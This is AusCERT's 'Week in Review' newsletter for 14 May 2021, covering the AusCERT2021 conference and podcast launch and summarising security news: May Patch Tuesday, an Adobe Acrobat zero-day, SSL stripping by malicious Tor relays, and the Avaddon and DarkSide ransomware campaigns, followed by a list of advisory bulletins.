//Week in review - 14 May 2021

AusCERT Week in Review for 14th May 2021


What a week! (although it certainly feels like we’ve been saying this a bit in 2021)

To kick things off, we celebrated the 20th anniversary of our annual conference AusCERT2021. It’s been a week of awesome catch-ups and learnings from the various presentation sessions on the conference program. Thank you so much for the support of our wonderful sponsors and delegates. We hope you enjoyed coming back together in-person as much as the AusCERT team did. For those who couldn’t make it, we will be sharing the content from the conference in due time via our YouTube channel.

We hope folks were able to get through all of May 2021’s Patch Tuesday fixes, please refer to our highlighted bulletins and articles below.

Thrilled to announce that we’ve now officially launched our AusCERT podcast, “Share today, save tomorrow” – a special shout out to our ex colleague Nick Soysa for coining this phrase. Episode 1 now available on our website here.

Last but not least, thank you for supporting AusCERT taking over the @WeAreBrisbane Twitter account this week, we hope that was an educational one for those who play in the Twitter space.

Until next week everyone, have a wonderful weekend – to our colleagues and followers of Muslim faith, Happy Eid ul Fitr, Eid Mubarak!

Microsoft’s May 2021 Patch Tuesday: 55 flaws fixed, four critical
Date: 2021-05-11
Author: ZDNet

Microsoft’s May Patch Tuesday dump included patches for 55 CVEs with four rated critical. There were also three zero-day bugs but none have been exploited.
Products impacted includes Internet Explorer, .NET Core and Visual Studio, Windows 10 and Office to name a few. You can find the updates for May here.
The fixed zero day bugs include:
– CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability
– CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability
– CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability

Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader
Date: 2021-05-11
Author: Threatpost

A patch for Adobe Acrobat, the world’s leading PDF reader, fixes a vulnerability under active attack affecting both Windows and macOS systems that could lead to arbitrary code execution.
Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. A patch is available, as part of the company’s Tuesday roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento.

Attackers added thousands of Tor exit nodes to carry out SSL stripping attacks
Date: 2021-05-10
Author: Security Affairs

Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept traffic and carry out SSL stripping attacks on users while accessing mixing websites, The Record first reported.
SSL Stripping (aka SSL Downgrade Attack) allows downgrading connection from secure HTTPS to HTTP which could expose the traffic to eavesdropping and data manipulation.
In the case of the attacks against the Tor network, threat actors aimed at replacing the addresses of legitimate wallets with the ones under the control of the attackers to hijack transactions.
In August 2020, the security researcher and Tor node operator “Nusenu” described this practice in an analysis on how malicious Tor Relays are exploiting users in 2020.
Nusenu has published a new part of its research that reveals that threat actor are still active.

US and Australia warn of escalating Avaddon ransomware attacks
Date: 2021-05-10
Author: Bleeping Computer

The Federal Bureau of Investigation and the Australian Cyber Security Centre are warning of an ongoing Avaddon ransomware campaign targeting organizations from an extensive array of sectors in the US and worldwide.
The FBI said in a TLP:GREEN flash alert last week that Avaddon ransomware affiliates are trying to breach the networks of manufacturing, healthcare, and other private sector organizations around the world.
The ACSC expanded on the targeting information, saying that the ransomware gang’s affiliates are targeting entities from a wide range of sectors, including but not limited to government, finance, law enforcement, energy, information technology, and health.

A Closer Look at the DarkSide Ransomware Gang
Date: 2021-05-11
Author: Krebs on Security

The FBI confirmed this week that a relatively new ransomware group known as DarkSide is responsible for an attack that caused Colonial Pipeline to shut down 5,550 miles of pipe, stranding countless barrels of gasoline, diesel and jet fuel on the Gulf Coast. Here’s a closer look at the DarkSide cybercrime gang, as seen through their negotiations with a recent U.S. victim that earns $15 billion in annual revenue.
New York City-based cyber intelligence firm Flashpoint said its analysts assess with a moderate-strong degree of confidence that the attack was not intended to damage national infrastructure and was simply associated with a target which had the finances to support a large payment.
“This would be consistent with DarkSide’s earlier activities, which included several ‘big game hunting’ attacks, whereby attackers target an organization that likely possesses the financial means to pay the ransom demanded by the attackers,” Flashpoint observed.

The DarkSide of the Ransomware Pipeline
Date: 2021-05-11
Author: Splunk

If you want to quickly find out how to use Splunk to find activity related to the DarkSide Ransomware, skip to the “Detection and Remediation of DarkSide” section.
Otherwise, read on for a quick breakdown of what happened to the Colonial Pipeline, how to detect the ransomware, and view MITRE ATT&CK mappings.

ESB-2021.1611 – ALERT Adobe Acrobat & Adobe Reader: Multiple vulnerabilities

Adobe reports that CVE-2021-28550 has been exploited in the wild that could lead to arbitrary code execution.

ASB-2021.0101 – ALERT exim: Multiple vulnerabilities

Serious vulnerabilities identified in the Exim mail server allowing remote attackers to gain complete root privileges.

ASB-2021.0110 – ALERT Microsoft Extended Security Update products

Microsoft releases its monthly security patch update for the month of May 2021 resolving 12 vulnerabilities.

ESB-2021.1644 – ALERT libgetdata: Multiple vulnerabilities

Multiple vulnerabilities in libgetdata are addressed by Debian’s security updates.

ASB-2021.0108 – Microsoft Developer Tools : Multiple vulnerabilities

Latest security patches for Microsoft fix multiple vulnerabilities in Developer Tools.

Stay safe, stay patched and have a good weekend!

The AusCERT team